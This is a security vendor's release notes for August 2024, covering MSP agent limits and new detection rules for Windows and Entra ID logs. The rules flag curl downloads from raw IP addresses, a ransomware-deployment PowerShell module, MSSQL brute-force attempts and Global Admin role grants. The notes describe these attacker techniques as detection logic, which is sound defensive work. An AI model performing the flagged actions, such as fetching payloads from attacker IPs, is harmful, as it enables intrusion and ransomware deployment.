Blumira Resources & Blog

August 2024 Product Release Notes

Written by Faith Bradley | Sep 17, 2024 7:07:07 PM

Summary

In August, we released new detection rules for Windows and Entra logs, and we updated the way we allocate Blumira Agents in Managed Service Provider (MSP) accounts with eligible licenses.

Feature and Platform Updates

  • MSP Agent Limits: MSPs with current contracts that do not include any legacy editions (i.e., Cloud or Advanced) now automatically receive two agents per user in the app for sub-accounts on XDR or SIEM+ editions. Sub-accounts on M365 Edition now get 5 agents to experience extended observability and detections for remote endpoints. With our August release, managing limits for Blumira Agent is as easy as updating the user count of the organization from the MSP Portal. We update the maximum agent count automatically, removing the need for partners to manually increase and keep track of the number of agents used by each account. MSP partners can find more details in MSP pricing.

Detection Updates

Log Type Detection Details

Windows or Blumira Agent Endpoint

NEW - Generic Locker PowerShell Module

This new P1 Threat detection rule triggers an alert when a Windows device logs activity that matches behavior associated with a script known to be used by threat actors to deploy various ransomware variants.

Windows or Blumira Agent Endpoint

NEW - File Download from IP URL via Curl.EXE

This new P1 Suspect detection rule triggers when a user is seen using a Curl command to download files from an external IP address. Findings include the command used for the download.

Curl is a command line tool that is most commonly used to transfer data to and from a server. While it is a useful tool for administrators and developers, it is also used by threat actors to download malicious files and applications from their attack infrastructure. Curl is packaged by default with Windows 10 and higher.

Windows

NEW - Excessive MSSQL Login Failures

This new P2 Suspect detection rule is disabled by default, so it needs to be enabled by an administrator.

This rule triggers an alert when a device logs 30 or more failed logins against a MSSQL service on the device within a 1-hour window. This could indicate an attempted brute force attack or a misconfigured service account using incorrect or expired credentials.

Office365 AAD

Deprecated - Azure: AD Global Admin Role Assignment

This legacy detection rule was deprecated and replaced by the two new Entra ID rules described below.

Office365 AAD

and

Azure Directory Audit

NEW - Azure: Entra ID Global Admin Role Assignment

This new detection rule is a revised version of the deprecated “Azure: AD Global Admin Role Assignment” rule. It is a P1 Suspect rule that is enabled by default when deployed. This rule triggers an alert when a user or group in your Entra ID Directory is assigned a Global Administrator Role.

This detection rule excludes assignments done by Privileged Identity Management (PIM) and Granular Delegated Admin Permissions (GDAP).

Office365 AAD

and

Azure Directory Audit

NEW - Azure: Entra ID Global Admin Role Assignment by PIM/GDA

This new P3 Suspect detection rule is disabled by default, so it needs to be enabled by an administrator.

This rule triggers an alert when either Privileged Identity Management or Granular Delegated Admin Permissions (GDAP) assigns a Global Administrator Role to a user or group in your Entra ID Directory.

Multi-source

Reconnaissance via Net Commands

Findings for this detection now include the parent.cmdline field in matched evidence when it exists in the log data.

July Release Notes

In case you missed the July updates, you can find and review those notes here.